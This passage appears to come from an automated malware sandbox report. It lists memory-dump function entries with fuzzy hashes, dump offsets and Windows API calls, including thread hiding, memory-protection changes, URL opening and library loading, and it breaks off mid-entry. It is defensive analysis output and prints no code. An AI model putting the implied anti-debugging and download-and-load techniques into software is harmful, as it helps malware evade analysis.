            • Opcode Fuzzy Hash: 35e0a0985c711d0c696816a2c18c10d664e27804eac26212dff859e95512f4a4
            • Instruction Fuzzy Hash: 702108B0608B09CDFF278A18C5B63A436D5EF5136CF54426ACD02874EDD33184E4C641
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: c4a0f85252cce9a1c4792e20ca61888b860622afe71bbfb40b75cf81346f52dd
            • Instruction ID: 9507adb35eac37d56d91a453d744bb711ce4143e47d6aa1ff7cd857e5ed609de
            • Opcode Fuzzy Hash: c4a0f85252cce9a1c4792e20ca61888b860622afe71bbfb40b75cf81346f52dd
            • Instruction Fuzzy Hash: D321E9B0608B09CDFF278A18C9BA3A436D6EF4132DF94566BCD12874DDD33284E4C682
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: 787b31842b406c896a53bfea7cfb0ae378ba06a96fe9dd3863f3128c862f3358
            • Instruction ID: f9993988272ad5ee7981dea95021159c1edcd01f1b06d48a10e48c2915de60eb
            • Opcode Fuzzy Hash: 787b31842b406c896a53bfea7cfb0ae378ba06a96fe9dd3863f3128c862f3358
            • Instruction Fuzzy Hash: A711EE70608B09CDFF274E18C9AA36476D5EF4133DF94566ADD15870EDD33284E4C681
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: 875e8c8da3fb8bb62e419a3dd3043f1f86d4c7d0df2950aacd019f5f2134ea9e
            • Instruction ID: f323cbc4ff18c2577c7201082bd7a37fcdb26655c059b6b73156ec2283a6b0c7
            • Opcode Fuzzy Hash: 875e8c8da3fb8bb62e419a3dd3043f1f86d4c7d0df2950aacd019f5f2134ea9e
            • Instruction Fuzzy Hash: EA110BB0608B09CEFF278A18C5BA36432D1EF4133DF944266CD12860DDD33188E4C641
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: 18d0de89fa25eddb2b357e13734bd343f735cdd96496677fe00a5980f89e15f1
            • Instruction ID: ecee6044b1d2f741961c2ff616c442f4a625d90c96818152983c13744953b34c
            • Opcode Fuzzy Hash: 18d0de89fa25eddb2b357e13734bd343f735cdd96496677fe00a5980f89e15f1
            • Instruction Fuzzy Hash: 4111CC70A08B09CDFF279A18C5AA36476D5EF5132DF98566ACD11870EDD33688D4C681
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: 29134a0f89cfcf0db9c51179cf2711b4c97ba47ce5c110b4f8d8663b194c3d83
            • Instruction ID: 83aa593b6c2b645a4a74e302651a74b1ce7959711058767949fbdba83852ebf2
            • Opcode Fuzzy Hash: 29134a0f89cfcf0db9c51179cf2711b4c97ba47ce5c110b4f8d8663b194c3d83
            • Instruction Fuzzy Hash: 07112D70A08B05CDFF2B8B18C5AA3A477E1AF4132DF89416BCD01870EEC33284D4C681
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: 10f0035db082803e3f18f2b37773143a1e7c04fcd1aa01c06474e36a467edeed
            • Instruction ID: 0e37965fdb6c51e8c556e30b6a155ae33bec0c94a364b2a335948e1a0913ed43
            • Opcode Fuzzy Hash: 10f0035db082803e3f18f2b37773143a1e7c04fcd1aa01c06474e36a467edeed
            • Instruction Fuzzy Hash: EBE09260704503CDFB2EEA28C1A66A836A3EE907087D84055CA024685CD23204D5C741
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,01305FBC,00000040,01302493,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 013063DA
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: MemoryProtectVirtual
            • String ID:
            • API String ID: 2706961497-0
            • Opcode ID: 658cf49023934f887b4d97786d7184f0eff78d941967bf593943438e12138f42
            • Instruction ID: f41e4f1abd396bb3c9c41c272a2a997ecf953f4d9cecf306bb95360e10c9f662
            • Opcode Fuzzy Hash: 658cf49023934f887b4d97786d7184f0eff78d941967bf593943438e12138f42
            • Instruction Fuzzy Hash: 6DC012E02240006E68048A68CD58D2BB2AA86D8A28B90C32CB832222CCC930EC048632
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.598296245.0000000000FE0000.00000040.00000001.sdmp, Offset: 00FE0000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 727e4e99f4af7cbc0e0be8cbb59e30e525d627808b3ff8b300c1e54ea899bedb
            • Instruction ID: 6368ebeee24bc1edefe0e6ea43debe1338a01f914d02d091b3ce59008c80cfb0
            • Opcode Fuzzy Hash: 727e4e99f4af7cbc0e0be8cbb59e30e525d627808b3ff8b300c1e54ea899bedb
            • Instruction Fuzzy Hash: DDC2BB34B042188FDB24EB75C8547AEB7F2AF8A344F1084A9D50AEB391DF319D46CB56
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.598296245.0000000000FE0000.00000040.00000001.sdmp, Offset: 00FE0000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 6672220588c43c23fa40a858380526be376542e952881b5d3b96a4100ddc160b
            • Instruction ID: 16871f9c5186c80f9cc3ec324c1f02fcd7c64d93d3e29ef3d0fc9f687afdd11c
            • Opcode Fuzzy Hash: 6672220588c43c23fa40a858380526be376542e952881b5d3b96a4100ddc160b
            • Instruction Fuzzy Hash: 1A52D13190D3C08FD722CBBA86942D97F96EF5B318F2C58D9C1826F1A3DA609987D741
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.602688195.000000001D970000.00000040.00000001.sdmp, Offset: 1D970000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0dec3c02d46e483008709af06d1f47038a1ed64d499aa58848c3c02ad53035d0
            • Instruction ID: cd1a11218cc7549f856f4ba44f660ec39ebfcc7811a3f63514aedead0a0898c0
            • Opcode Fuzzy Hash: 0dec3c02d46e483008709af06d1f47038a1ed64d499aa58848c3c02ad53035d0
            • Instruction Fuzzy Hash: 14D1EE30B042055FDB14DB74C895B6EB6E6AFCA304F15842CD61AAF390DF71EC428B96
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.603038189.000000001DB10000.00000040.00000001.sdmp, Offset: 1DB10000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a7885a022d413043f0da650beb5fba516824a0494350501c6724ba5baebdc2ac
            • Instruction ID: c43db9062d0802401c15eeb9b032b255877623cbde6e5f555eec839319a69c16
            • Opcode Fuzzy Hash: a7885a022d413043f0da650beb5fba516824a0494350501c6724ba5baebdc2ac
            • Instruction Fuzzy Hash: 9A12C3F04057668BE310CF65C9C8BA63BB9B745798F534308D2632B6E2D7B9118ADF48
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.603038189.000000001DB10000.00000040.00000001.sdmp, Offset: 1DB10000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: cc7f5a3203d1c72e4eb0a0637287d0f2c1d229d16972750b580cd990e57c08fe
            • Instruction ID: 97888b5cd43ce2778bd365e6fe562e23d80ffd8db4ec7606522dce421e1a9e64
            • Opcode Fuzzy Hash: cc7f5a3203d1c72e4eb0a0637287d0f2c1d229d16972750b580cd990e57c08fe
            • Instruction Fuzzy Hash: 33C12BB08117658BD710CF64C9C87AA7BB9FB85798F134309D2632B2D2D7B9148ACF58
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.603038189.000000001DB10000.00000040.00000001.sdmp, Offset: 1DB10000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f812c5ac32653759f35f248190e914ac932257a9119181bab18dea1db371a79e
            • Instruction ID: a454b26c5d324601c4702874161b61339b8ceb2bd831e96c783bc5e5a8343776
            • Opcode Fuzzy Hash: f812c5ac32653759f35f248190e914ac932257a9119181bab18dea1db371a79e
            • Instruction Fuzzy Hash: 8DB10AB08057658FD710CF64C9C8BAA3BB9BB85798F134309D1632B2D2D7B9148ACF44
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetCurrentProcess.KERNEL32 ref: 1DB169A0
            • GetCurrentThread.KERNEL32 ref: 1DB169DD
            • GetCurrentProcess.KERNEL32 ref: 1DB16A1A
            • GetCurrentThreadId.KERNEL32 ref: 1DB16A73
            Memory Dump Source
            • Source File: 00000004.00000002.603038189.000000001DB10000.00000040.00000001.sdmp, Offset: 1DB10000, based on PE: false
            Similarity
            • API ID: Current$ProcessThread
            • String ID:
            • API String ID: 2063062207-0
            • Opcode ID: 7f3b7facd78f11320e9513abfe3a59dea3cb0c04ca44459867983a110d19be8a
            • Instruction ID: 5e510eb6922cbdd164770a8a0d3c21e0ec8dda1d80604d583291c1b7388c0124
            • Opcode Fuzzy Hash: 7f3b7facd78f11320e9513abfe3a59dea3cb0c04ca44459867983a110d19be8a
            • Instruction Fuzzy Hash: 8E5167B49047898FDB00CFA9D5887EEBFF0AF89314F24855DE05AAB390C7755844CB66
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetCurrentProcess.KERNEL32 ref: 1DB169A0
            • GetCurrentThread.KERNEL32 ref: 1DB169DD
            • GetCurrentProcess.KERNEL32 ref: 1DB16A1A
            • GetCurrentThreadId.KERNEL32 ref: 1DB16A73
            Memory Dump Source
            • Source File: 00000004.00000002.603038189.000000001DB10000.00000040.00000001.sdmp, Offset: 1DB10000, based on PE: false
            Similarity
            • API ID: Current$ProcessThread
            • String ID:
            • API String ID: 2063062207-0
            • Opcode ID: b1bf54945ce81d0bd905ff13324876cb4982ae9e6c614594ebc9a2a267bc6623
            • Instruction ID: 711c887d1556deb250e1aede505730fcd3cc2f169d3dc9b38806671f446420e3
            • Opcode Fuzzy Hash: b1bf54945ce81d0bd905ff13324876cb4982ae9e6c614594ebc9a2a267bc6623
            • Instruction Fuzzy Hash: 7D5143B49002498FDB00CFAAD588BAEBBF1EF8C314F208559E55AAB350D7756844CB66
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • InternetOpenA.WININET(01303F73,00000000,00000000,00000000,00000000), ref: 0130371B
            • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 013037EA
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InternetOpen
            • String ID: t
            • API String ID: 2038078732-2238339752
            • Opcode ID: f1427dfd08f776f39db8984e73365d992de838e15c534a798d2fdd085fe8db45
            • Instruction ID: 9ea5cc9fa2f9aab2f0eaa972cd3319aaac562126b634777dd23c73d3c45e5f62
            • Opcode Fuzzy Hash: f1427dfd08f776f39db8984e73365d992de838e15c534a798d2fdd085fe8db45
            • Instruction Fuzzy Hash: 3A410E3424438BAFEF325E68CC76FEA36EAAF507A4F844119ED4A568C4E7718584C611
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 013037EA
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InternetOpen
            • String ID: t
            • API String ID: 2038078732-2238339752
            • Opcode ID: b7bd64ecbe67885d94dcb445f1124e0185cde710ab4bf9b5ae892f408638e3ba
            • Instruction ID: fcd4a041a6b2a2faca4cecc478969e2490fe4691b89a571d918c86cea6c5fe1f
            • Opcode Fuzzy Hash: b7bd64ecbe67885d94dcb445f1124e0185cde710ab4bf9b5ae892f408638e3ba
            • Instruction Fuzzy Hash: C0310D3424438BAFEF325D58CC76BEA37EEAF01394F854015DD89968C1E7368584C611
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 013037EA
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InternetOpen
            • String ID: t
            • API String ID: 2038078732-2238339752
            • Opcode ID: 2fe3a861a3b0280e6954c33dd7081c7d0c3649d4a5b5995a89f7fae7dfd420b1
            • Instruction ID: e4362cd14b849116265fbc9b4fb556471b21fc17ff840e0f1eb077e3ca214b29
            • Opcode Fuzzy Hash: 2fe3a861a3b0280e6954c33dd7081c7d0c3649d4a5b5995a89f7fae7dfd420b1
            • Instruction Fuzzy Hash: C521D73424438BAFEF314D58CCB6FEA37EEAF007A4F844119ED4A568D0E7328184D611
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000004.00000002.598296245.0000000000FE0000.00000040.00000001.sdmp, Offset: 00FE0000, based on PE: false
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: e1f2069896ecb379dc776eb4d7875689cef089b06e23394178efa833ac5d732b
            • Instruction ID: c41c24bca519e2dd23c493eaf3255ef75c942ca2eca6975be426a91e17d99cb3
            • Opcode Fuzzy Hash: e1f2069896ecb379dc776eb4d7875689cef089b06e23394178efa833ac5d732b
            • Instruction Fuzzy Hash: 5751D531B042499FCF00DFB4C888AAEB7B5BF89344F14896AE512DB351DF70E9498B65
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DB151A2
            Memory Dump Source
            • Source File: 00000004.00000002.603038189.000000001DB10000.00000040.00000001.sdmp, Offset: 1DB10000, based on PE: false
            Similarity
            • API ID: CreateWindow
            • String ID:
            • API String ID: 716092398-0
            • Opcode ID: 00c6e9d51cc851ae405a8f003a1384e33da0ff9b1b16dd6b7a9b846df93303d0
            • Instruction ID: 778cfa3f1d8cb078fa2e58d395fc215737cc36df2a9a5e181ba59e664294cd06
            • Opcode Fuzzy Hash: 00c6e9d51cc851ae405a8f003a1384e33da0ff9b1b16dd6b7a9b846df93303d0
            • Instruction Fuzzy Hash: E241DFB1D103499FDF15CF99D880ADEBBB5FF88314F64812AE819AB210D774A885CF91
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DB151A2
            Memory Dump Source
            • Source File: 00000004.00000002.603038189.000000001DB10000.00000040.00000001.sdmp, Offset: 1DB10000, based on PE: false
            Similarity
            • API ID: CreateWindow
            • String ID:
            • API String ID: 716092398-0
            • Opcode ID: d9080b59a9ad43ed5f58335cdc8faf9e96992638ebec6636f4b89ac175e65293
            • Instruction ID: aef6dad5f8169f1bb626054af835709be38cfe175e745b9d848a0edfb91ab9c7
            • Opcode Fuzzy Hash: d9080b59a9ad43ed5f58335cdc8faf9e96992638ebec6636f4b89ac175e65293
            • Instruction Fuzzy Hash: 7A51DEB1D10249DFDF05CFA9D980ADEBBB1BF48314F24812AE819AB210D774A885CF91
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CallWindowProcW.USER32(?,?,?,?,?), ref: 1DB17F01
            Memory Dump Source
            • Source File: 00000004.00000002.603038189.000000001DB10000.00000040.00000001.sdmp, Offset: 1DB10000, based on PE: false
            Similarity
            • API ID: CallProcWindow
            • String ID:
            • API String ID: 2714655100-0
            • Opcode ID: b9f1ba6b3de8d8072ee20ec832c7bc215db84b7311204163b5808d771d8604bb
            • Instruction ID: 6928f4046e0f46984026d4578b2ae0d9f79865728df62087ea233c7b60545d78
            • Opcode Fuzzy Hash: b9f1ba6b3de8d8072ee20ec832c7bc215db84b7311204163b5808d771d8604bb
            • Instruction Fuzzy Hash: 88411BB5A00245CFDB00CF95C484BAABBF5FF88314F25C459E51AAB321D775A841CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • TerminateThread.KERNEL32(000000FE,00000000), ref: 013020D3
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: TerminateThread
            • String ID:
            • API String ID: 1852365436-0
            • Opcode ID: 2fa6efd44efad29a2f539af1a24fdfe388af0d9b68ab381f8051cf14d43ed969
            • Instruction ID: 5a9786689fa50824a2b2151f44d6ce7b6b89d6cdc3cb0058a6bf91b4c17f02b3
            • Opcode Fuzzy Hash: 2fa6efd44efad29a2f539af1a24fdfe388af0d9b68ab381f8051cf14d43ed969
            • Instruction Fuzzy Hash: 3F113A706803059FEB239A5C8DF4BD637E5EF15268F960262DE469B1E1D325C886C612
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • RtlEncodePointer.NTDLL(00000000), ref: 1DB1BEF2
            Memory Dump Source
            • Source File: 00000004.00000002.603038189.000000001DB10000.00000040.00000001.sdmp, Offset: 1DB10000, based on PE: false
            Similarity
            • API ID: EncodePointer
            • String ID:
            • API String ID: 2118026453-0
            • Opcode ID: 299acd41c15cf928ed4dbb016eaccfa6a48c9fa5c02917efca7ee219df89ec5b
            • Instruction ID: 0d6321805d6ff33b0256cf9d6dd768ab7da31d203e2eeb4e9ff5a22e3b9f4e56
            • Opcode Fuzzy Hash: 299acd41c15cf928ed4dbb016eaccfa6a48c9fa5c02917efca7ee219df89ec5b
            • Instruction Fuzzy Hash: E921FCB28013498FDB10DFA5D5483DEBFF0FB0A704F10886AD50AAB642C3385508CF6A
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 013037EA
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InternetOpen
            • String ID:
            • API String ID: 2038078732-0
            • Opcode ID: 7dce5eee6b0f1289567518540204701fb6c3bf88c493f68512104880f1376b90
            • Instruction ID: ab81842c56c957151d7f2120b73942a570f43127c966fbadb0f2cc318984fab4
            • Opcode Fuzzy Hash: 7dce5eee6b0f1289567518540204701fb6c3bf88c493f68512104880f1376b90
            • Instruction Fuzzy Hash: 9511983424438BAFDF318E58CCB5BEA3BAAAF013A4F844619DD4A578D1E3328184DA11
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DB16BEF
            Memory Dump Source
            • Source File: 00000004.00000002.603038189.000000001DB10000.00000040.00000001.sdmp, Offset: 1DB10000, based on PE: false
            Similarity
            • API ID: DuplicateHandle
            • String ID:
            • API String ID: 3793708945-0
            • Opcode ID: 0e88b5e299ead5be82ba680fd286379c042b8dc333dcf796360e69486b07feee
            • Instruction ID: 73d4decf2c9d3dd2ed3cf8123f04e5e874bdfe7aaf162fa22d8c86a40c4bb1a7
            • Opcode Fuzzy Hash: 0e88b5e299ead5be82ba680fd286379c042b8dc333dcf796360e69486b07feee
            • Instruction Fuzzy Hash: 6521F3B5D00249AFDB00CFA9D984AEEBBF4FF48324F14841AE919A7310D374A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DB16BEF
            Memory Dump Source
            • Source File: 00000004.00000002.603038189.000000001DB10000.00000040.00000001.sdmp, Offset: 1DB10000, based on PE: false
            Similarity
            • API ID: DuplicateHandle
            • String ID:
            • API String ID: 3793708945-0
            • Opcode ID: d3c559a5605f4953d157a54084fbab489f4602339b9b70e9e3b9fc0f2e32ea1c
            • Instruction ID: 1f3368d6e4c73168cf468fc0dd689db13cd886bb872b807894c6213f67fd6c09
            • Opcode Fuzzy Hash: d3c559a5605f4953d157a54084fbab489f4602339b9b70e9e3b9fc0f2e32ea1c
            • Instruction Fuzzy Hash: 1321EFB5D00249AFDB00CFA9D584AEEBBF4EF48324F14841AE919A7210D378A954CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,1D97D719,00000800), ref: 1D97D7AA
            Memory Dump Source
            • Source File: 00000004.00000002.602688195.000000001D970000.00000040.00000001.sdmp, Offset: 1D970000, based on PE: false
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: dac296dc1f99c6691a7f54f416d04bc73a1ffeeb07dc66bb1925855786f01d3d
            • Instruction ID: f1294030d9fed8e9d5b7d2f11416e2a0b2fede9144b8a3ec520af9e648b77ba4
            • Opcode Fuzzy Hash: dac296dc1f99c6691a7f54f416d04bc73a1ffeeb07dc66bb1925855786f01d3d
            • Instruction Fuzzy Hash: DD2106B6D00209DFDB10CFAAD444AEEFBF4EB89324F01841EE559A7200C375A545CFA5
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,1D97D719,00000800), ref: 1D97D7AA
            Memory Dump Source
            • Source File: 00000004.00000002.602688195.000000001D970000.00000040.00000001.sdmp, Offset: 1D970000, based on PE: false
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: cdd7bb5e430b27a03d460a18b84c5bf097c527f554a82a9f0357e5f84f091505
            • Instruction ID: 6237ce4795fa257517f3bd87e8f7d5e2f0f1e00526ef99d76051397829f95f25
            • Opcode Fuzzy Hash: cdd7bb5e430b27a03d460a18b84c5bf097c527f554a82a9f0357e5f84f091505
            • Instruction Fuzzy Hash: F711D6B6900249DFDB11CF9AD444BDEBBF4AB88314F11842EE559A7200C375A945CFA6
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • RtlEncodePointer.NTDLL(00000000), ref: 1DB1BEF2
            Memory Dump Source
            • Source File: 00000004.00000002.603038189.000000001DB10000.00000040.00000001.sdmp, Offset: 1DB10000, based on PE: false
            Similarity
            • API ID: EncodePointer
            • String ID:
            • API String ID: 2118026453-0
            • Opcode ID: c7083c89ae2055a2514e7455cf818ce9155fa0bb74e21a11b673c4ac0974b669
            • Instruction ID: 9a0fd7bab81bf245619502fb6321a4feb0b8316d4bed25901d3f5cae70e64e96
            • Opcode Fuzzy Hash: c7083c89ae2055a2514e7455cf818ce9155fa0bb74e21a11b673c4ac0974b669
            • Instruction Fuzzy Hash: 5911ACB2D013498FDB10DFAAC5487DEBBF4FB49314F208829D50AA7645C7396544CFAA
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetModuleHandleW.KERNEL32(00000000), ref: 1DB14116
            Memory Dump Source
            • Source File: 00000004.00000002.603038189.000000001DB10000.00000040.00000001.sdmp, Offset: 1DB10000, based on PE: false
            Similarity
            • API ID: HandleModule
            • String ID:
            • API String ID: 4139908857-0
            • Opcode ID: 471eeef7d4bb5a9ca3863e4bd147671b07a4be835712482a838a3f398ee9ba78
            • Instruction ID: 81eb656739ef14fab53f47f11fe7e68262ce3db1d15fe367aa26ed93f1728121
            • Opcode Fuzzy Hash: 471eeef7d4bb5a9ca3863e4bd147671b07a4be835712482a838a3f398ee9ba78
            • Instruction Fuzzy Hash: 5311F3B5D002498FDB10DF9AD444BDEBBF4EB89214F11842AD95AB7200D379A545CFA2
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetModuleHandleW.KERNEL32(00000000), ref: 1DB14116
            Memory Dump Source
            • Source File: 00000004.00000002.603038189.000000001DB10000.00000040.00000001.sdmp, Offset: 1DB10000, based on PE: false
            Similarity
            • API ID: HandleModule
            • String ID:
            • API String ID: 4139908857-0
            • Opcode ID: 95e0950d00113391225c3c7711251ecdcd0c37941c92e6d07bd5baa8cfdd4371
            • Instruction ID: 430f694de5c20badc133f5d5c21eeee3f3f85cba55f928c710dc5aa9987b8a32
            • Opcode Fuzzy Hash: 95e0950d00113391225c3c7711251ecdcd0c37941c92e6d07bd5baa8cfdd4371
            • Instruction Fuzzy Hash: 3D1113B6D002498FCB10CFAAD544BDEFBF4EF89224F15842AD55AB7600C379A545CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000004.00000002.602716873.000000001D980000.00000040.00000001.sdmp, Offset: 1D980000, based on PE: false
            Similarity
            • API ID: Initialize
            • String ID:
            • API String ID: 2538663250-0
            • Opcode ID: bcf5a72a1ee25805a696861d89b0742f8a47e198ef6bbf9b4db5621b6638dadb
            • Instruction ID: c9f9d8c907dd600e8145646f991938c90093e5afba63e2b632019bb9a8a3f02c
            • Opcode Fuzzy Hash: bcf5a72a1ee25805a696861d89b0742f8a47e198ef6bbf9b4db5621b6638dadb
            • Instruction Fuzzy Hash: 4F1100B19002598FCB10DFA9D484BDEBBF4EF48328F20842AD559A7210D374A944CFA6
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000004.00000002.602716873.000000001D980000.00000040.00000001.sdmp, Offset: 1D980000, based on PE: false
            Similarity
            • API ID: Initialize
            • String ID:
            • API String ID: 2538663250-0
            • Opcode ID: 916c9db7a8a4cbd8845bd47de8296ea3e0eea2bcd782c65f03ece6a6d64689e7
            • Instruction ID: 39a7fdf68707fe0eb65a2bee40ddf55b32c05b44da3049ba15949a40eedeb610
            • Opcode Fuzzy Hash: 916c9db7a8a4cbd8845bd47de8296ea3e0eea2bcd782c65f03ece6a6d64689e7
            • Instruction Fuzzy Hash: 3D11F3B1D00359CFCB10DFA9D484BDEBBF4EB48324F14841AD559A7600D375A944CFA6
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • LoadLibraryA.KERNEL32(?,321C9581,?,01305F22,01302493,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 013054CE
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 565172ae2774e033c35b203270141bfe7bdfebbe549e5fbb47c007f5b14db31d
            • Instruction ID: e89aa39f6d15a343f1f8f0b358722bd85dc549508fbff9e4720169b0fa9d51a6
            • Opcode Fuzzy Hash: 565172ae2774e033c35b203270141bfe7bdfebbe549e5fbb47c007f5b14db31d
            • Instruction Fuzzy Hash: 74F0F654B0170AA9EF233A6C4DB07FD21CCCF1136DFD54221EC92A18D1C71484814D03
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • LoadLibraryA.KERNEL32(?,321C9581,?,01305F22,01302493,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 013054CE
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 64580569a34c03ca9f63d0e7b06f41572744c969c925daef07cdba432326fd32
            • Instruction ID: ad88ba089f44d2a5103c79acb4e002ed56c4506b71df14c1b29e34dbde572f6b
            • Opcode Fuzzy Hash: 64580569a34c03ca9f63d0e7b06f41572744c969c925daef07cdba432326fd32
            • Instruction Fuzzy Hash: 6DF0B454B0170A9AEF233A6C9DB07FD21D9DF1533DFD54222ECA2968D1C72884844E03
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • LoadLibraryA.KERNEL32(?,321C9581,?,01305F22,01302493,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 013054CE
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: be7856d653c3eb0d57167cd4b2d024e751c21780d796ffbeb3aa70841a35e2cb
            • Instruction ID: d183f6d673b2e42301980826add61468a0123bcbe2adb69c34f87c7e76fb4d54
